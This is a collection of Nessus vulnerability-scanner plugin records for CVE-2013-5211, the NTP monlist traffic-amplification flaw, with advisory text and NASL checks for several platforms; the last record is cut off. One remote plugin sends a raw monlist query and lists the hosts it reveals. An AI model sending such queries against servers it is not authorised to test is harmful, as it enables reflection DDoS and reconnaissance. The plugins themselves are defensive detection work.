"#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3613.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93449);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"Oracle Linux 6 : ntp (ELSA-2016-3613)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.2.6p5-10.0.1.el6_8.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006329.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"ntp-4.2.6p5-10.0.1.el6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ntp-doc-4.2.6p5-10.0.1.el6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ntp-perl-4.2.6p5-10.0.1.el6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ntpdate-4.2.6p5-10.0.1.el6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-doc / ntp-perl / ntpdate\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:47", "description": "ntp.org reports :\n\nUnrestricted access to the monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013\n\nUse noquery to your default restrictions to block all status queries.\n\nUse disable monitor to disable the ``ntpdc -c monlist'' command while still allowing other status queries.", "cvss3": {}, "published": "2014-01-15T00:00:00", "type": "nessus", "title": "FreeBSD : ntpd DRDoS / Amplification Attack using ntpdc monlist command (3d95c9a7-7d5c-11e3-a8c1-206a8a720317)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ntp", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3D95C9A77D5C11E3A8C1206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/71960", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71960);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n script_xref(name:\"FreeBSD\", value:\"SA-14:02.ntpd\");\n\n script_name(english:\"FreeBSD : ntpd DRDoS / Amplification Attack using ntpdc monlist command (3d95c9a7-7d5c-11e3-a8c1-206a8a720317)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ntp.org reports :\n\nUnrestricted access to the monlist feature in ntp_request.c in ntpd in\nNTP before 4.2.7p26 allows remote attackers to cause a denial of\nservice (traffic amplification) via forged (1) REQ_MON_GETLIST or (2)\nREQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013\n\nUse noquery to your default restrictions to block all status queries.\n\nUse disable monitor to disable the ``ntpdc -c monlist'' command while\nstill allowing other status queries.\"\n );\n # http://support.ntp.org/bin/view/Main/SecurityNotice#DRDoS_Amplification_Attack_using\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?58c8d5f5\"\n );\n # https://vuxml.freebsd.org/freebsd/3d95c9a7-7d5c-11e3-a8c1-206a8a720317.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0fa4d7b9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ntp<4.2.7p26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:16:24", "description": "According to its self-reported version number, the remote Juniper Junos device is affected by a vulnerability in the NTP daemon related to the handling of the 'monlist' command. A remote attacker can exploit this by forging a request that results in a distributed denial of service.\n\nNote that this issue only affects devices with NTP client or server enabled.", "cvss3": {}, "published": "2014-09-19T00:00:00", "type": "nessus", "title": "Juniper Junos NTP Server Amplification Remote DoS (JSA10613)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:juniper:junos", "cpe:/a:ntp:ntp"], "id": "JUNIPER_JSA10613.NASL", "href": "https://www.tenable.com/plugins/nessus/77756", "sourceData": "#TRUSTED 59ace462f8561f84ebd33848e0ebe82c09bfbfa98cd0ab512ccbf459f0033f1c7d2f22fbce29ce81ba536e5ef580fded0b0b80dd4dd46205fda7d33062608a4142aca7c51fd2a5a0bb5b0f50b7c270a315491fdffecfc099c25d7bedcdfdef618db5578fafc75bf55cd255eeab2f6b87f326a648ddf585c60fe2e2ba27bf752caed97212d384ba2692d7d39235b86e5c45a76feaac299840cb52e5824e74366a73761bda640a91779bd1db4760e8a1869bdaf8324e9d888f7cb32b14f2528ab9a7601012b898cee52d3c8d2c6b148d353931d775d8457bf8c40f769674a378043fd8f0291ccb4eae4946ce0e95caabc61a0f6840d4b2f225a11d0e0f235ab8a7cbdc8fe59502d467bd239369c71796112c33706a93cc311036ebd26ba5f0e71b5d9f0680f0e6776188de401d24792c1874cb8665d606a56686753feda41c1fbcb808f84fd7aa257855b9a3c755f5fc90d1dcffd70789a86bb17f8db70823d080be354e54baec5a61ccd5bc341a03bbf8b38545e7de4bafe56df4048eaafc2159a352e3c9a63e0fa4b7e649f50f9942ed68e02a422a04ed94be59fff0c0a07156379bd17fa5224e229eaf9785006c0336ecc14cabb92e7855cd8c74e59955c42adb44da8b1a465d629e0106db53897ca224e7785540b842ba34f9f6278e810c89aec79a98a908ee5e55cac3778642c3d1a1fa07dce5da5ef1b9c54e0043c8ece8\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77756);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/12\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"EDB-ID\", value:\"33073\");\n script_xref(name:\"ICSA\", value:\"14-051-04\");\n script_xref(name:\"JSA\", value:\"JSA10613\");\n\n script_name(english:\"Juniper Junos NTP Server Amplification Remote DoS (JSA10613)\");\n script_summary(english:\"Checks the Junos version, build date, and configuration.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Juniper\nJunos device is affected by a vulnerability in the NTP daemon related\nto the handling of the 'monlist' command. A remote attacker can\nexploit this by forging a request that results in a distributed denial\nof service.\n\nNote that this issue only affects devices with NTP client or server\nenabled.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10613\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant Junos software release or workaround referenced in\nJuniper advisory JSA10613.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\", \"Host/Juniper/JUNOS/BuildDate\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos_kb_cmd_func.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\nbuild_date = get_kb_item_or_exit('Host/Juniper/JUNOS/BuildDate');\n\n# Junos OS 14.1R1 release date\nif (compare_build_dates(build_date, '2014-06-07') >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, 'Junos', ver + ' (build date ' + build_date + ')');\n\nfixes = make_array();\nfixes['11.4'] = '11.4R12';\nfixes['12.1'] = '12.1R10';\nfixes['12.1X44'] = '12.1X44-D35';\nfixes['12.1X45'] = '12.1X45-D25';\nfixes['12.1X46'] = '12.1X46-D15';\nfixes['12.1X47'] = '12.1X47-D10';\nfixes['12.2'] = '12.2R8';\nfixes['12.3'] = '12.3R7';\nfixes['13.1'] = '13.1R4-S2';\nfixes['13.2'] = '13.2R4';\nfixes['13.3'] = '13.3R2';\nfixes['14.1'] = '14.1R1';\n\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\n# Check for NTP\noverride = TRUE;\nbuf = junos_command_kb_item(cmd:\"show configuration | display set\");\nif (buf)\n{\n pattern = \"^set system ntp server\";\n if (!junos_check_config(buf:buf, pattern:pattern))\n audit(AUDIT_HOST_NOT, 'affected because neither a NTP client nor server are enabled');\n override = FALSE;\n}\n\njunos_report(ver:ver, fix:fix, override:override, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:40", "description": "The remote host is affected by the vulnerability described in GLSA-201401-08 (NTP: Traffic amplification)\n\n ntpd is susceptible to a reflected Denial of Service attack. Please review the CVE identifiers and references below for details.\n Impact :\n\n An unauthenticated remote attacker may conduct a distributed reflective Denial of Service attack on another user via a vulnerable NTP server.\n Workaround :\n\n We modified the default ntp configuration in =net-misc/ntp-4.2.6_p5-r10 and added “noquery” to the default restriction which disallows anyone to query the ntpd status, including “monlist”.\n If you use a non-default configuration, and provide a ntp service to untrusted networks, we highly recommend you to revise your configuration to disable mode 6 and 7 queries for any untrusted (public) network.\n You can always enable these queries for specific trusted networks. For more details please see the “Access Control Support” chapter in the ntp.conf(5) man page.", "cvss3": {}, "published": "2014-01-20T00:00:00", "type": "nessus", "title": "GLSA-201401-08 : NTP: Traffic amplification", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:ntp", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201401-08.NASL", "href": "https://www.tenable.com/plugins/nessus/72016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201401-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72016);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"GLSA\", value:\"201401-08\");\n\n script_name(english:\"GLSA-201401-08 : NTP: Traffic amplification\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201401-08\n(NTP: Traffic amplification)\n\n ntpd is susceptible to a reflected Denial of Service attack. Please\n review the CVE identifiers and references below for details.\n \nImpact :\n\n An unauthenticated remote attacker may conduct a distributed reflective\n Denial of Service attack on another user via a vulnerable NTP server.\n \nWorkaround :\n\n We modified the default ntp configuration in =net-misc/ntp-4.2.6_p5-r10\n and added “noquery” to the default restriction which disallows anyone\n to query the ntpd status, including “monlist”.\n If you use a non-default configuration, and provide a ntp service to\n untrusted networks, we highly recommend you to revise your configuration\n to disable mode 6 and 7 queries for any untrusted (public) network.\n You can always enable these queries for specific trusted networks. For\n more details please see the “Access Control Support” chapter in the\n ntp.conf(5) man page.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201401-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All NTP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/ntp-4.2.6_p5-r10'\n Note that the updated package contains a modified default configuration\n only. You may need to modify your configuration further.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/ntp\", unaffected:make_list(\"ge 4.2.6_p5-r10\"), vulnerable:make_list(\"lt 4.2.6_p5-r10\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"NTP\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:44", "description": "The version of ntpd running on the remote host has the 'monlist' command enabled. This command returns a list of recent hosts that have connected to the service. However, it is affected by a denial of service vulnerability in ntp_request.c that allows an unauthenticated, remote attacker to saturate network traffic to a specific IP address by using forged REQ_MON_GETLIST or REQ_MON_GETLIST_1 requests.\nFurthermore, an attacker can exploit this issue to conduct reconnaissance or distributed denial of service (DDoS) attacks.", "cvss3": {}, "published": "2014-01-02T00:00:00", "type": "nessus", "title": "Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2018-07-16T00:00:00", "cpe": ["cpe:/a:ntp:ntp"], "id": "NTP_MONLIST_ENABLED.NASL", "href": "https://www.tenable.com/plugins/nessus/71783", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71783);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"EDB-ID\", value:\"33073\");\n script_xref(name:\"ICSA\", value:\"14-051-04\");\n\n script_name(english:\"Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS\");\n script_summary(english:\"Checks if the remote ntpd supports the monlist command.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NTP server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ntpd running on the remote host has the 'monlist'\ncommand enabled. This command returns a list of recent hosts that have\nconnected to the service. However, it is affected by a denial of\nservice vulnerability in ntp_request.c that allows an unauthenticated,\nremote attacker to saturate network traffic to a specific IP address\nby using forged REQ_MON_GETLIST or REQ_MON_GETLIST_1 requests.\nFurthermore, an attacker can exploit this issue to conduct\nreconnaissance or distributed denial of service (DDoS) attacks.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://isc.sans.edu/diary/NTP+reflection+attack/17300\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.ntp.org/show_bug.cgi?id=1532\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10613\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using NTP from the Network Time Protocol Project, upgrade to\nNTP version 4.2.7-p26 or later. Alternatively, add 'disable monitor'\nto the ntp.conf configuration file and restart the service. Otherwise,\nlimit access to the affected service to trusted hosts, or contact the\nvendor for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ntp_open.nasl\");\n script_require_keys(\"NTP/Running\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Make sure NTP server is running\nget_kb_item_or_exit('NTP/Running');\n\nport = get_service(svc:\"ntp\", ipproto:\"udp\", default:123, exit_on_fail:TRUE);\n\nsoc = open_sock_udp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port, \"UDP\");\n\nreq = raw_string(0x17, 0, 0x03, 0x2a, 0, 0, 0, 0);\nreq += mkpad(40);\nsend(socket:soc, data:req);\nres = recv(socket:soc, length:508);\nclose(soc);\n\nif (isnull(res)) audit(AUDIT_RESP_NOT, port, \"an NTP 'monlist' command\", \"UDP\");\n\nif (strlen(res) < 8) audit(AUDIT_RESP_BAD, port, \"an NTP 'monlist' command\", \"UDP\");\n\nimpl = ord(res[2]);\ncode = ord(res[3]);\n\ncount = getword(blob:res, pos:4);\nsize = getword(blob:res, pos:6);\n\nif (size == 0) audit(AUDIT_LISTEN_NOT_VULN, \"NTP\", port+\" UDP\");\n\nif ((impl != 2 && impl != 3) || code != 42 || size != 72) audit(AUDIT_RESP_BAD, port, \"an NTP 'monlist' command\", \"UDP\");\n\n\nif (report_verbosity > 0)\n{\n off = 8;\n ips = \"\";\n\n for (i = 0; i < count; i++)\n {\n src = ord(res[off+16]) + \".\" + ord(res[off+17]) + \".\" + ord(res[off+18]) + \".\" + ord(res[off+19]);\n ips += src + '\\n';\n off += size;\n }\n\n report = '\\n' + 'Nessus was able to retrieve the following list of recent hosts to' +\n '\\n' + 'connect to this NTP server :' +\n '\\n' +\n '\\n' + ips;\n security_warning(port:port, protocol:\"udp\", extra:report);\n}\nelse security_warning(port:port, protocol:\"udp\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:09:27", "description": "The remote VMware ESXi host is version 5.0 prior to build 1749766. It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in the monlist feature in NTP. A remote attacker can exploit this flaw, using a specially crafted packet to load the query function in monlist, to conduct a distributed denial of service attack.\n (CVE-2013-5211)\n\n - An unspecified privilege escalation vulnerability exists that allows an attacker to gain host OS privileges or cause a denial of service condition by modifying a configuration file. (CVE-2014-8370)", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "ESXi 5.0 < Build 1749766 Multiple Vulnerabilities (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211", "CVE-2014-8370"], "modified": "2019-09-24T00:00:00", "cpe": ["cpe:/o:vmware:esxi", "cpe:/a:ntp:ntp"], "id": "VMWARE_ESXI_5_0_BUILD_1749766_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/81083", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81083);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/24 15:02:54\");\n\n script_cve_id(\"CVE-2013-5211\", \"CVE-2014-8370\");\n script_bugtraq_id(64692, 72338);\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"VMSA\", 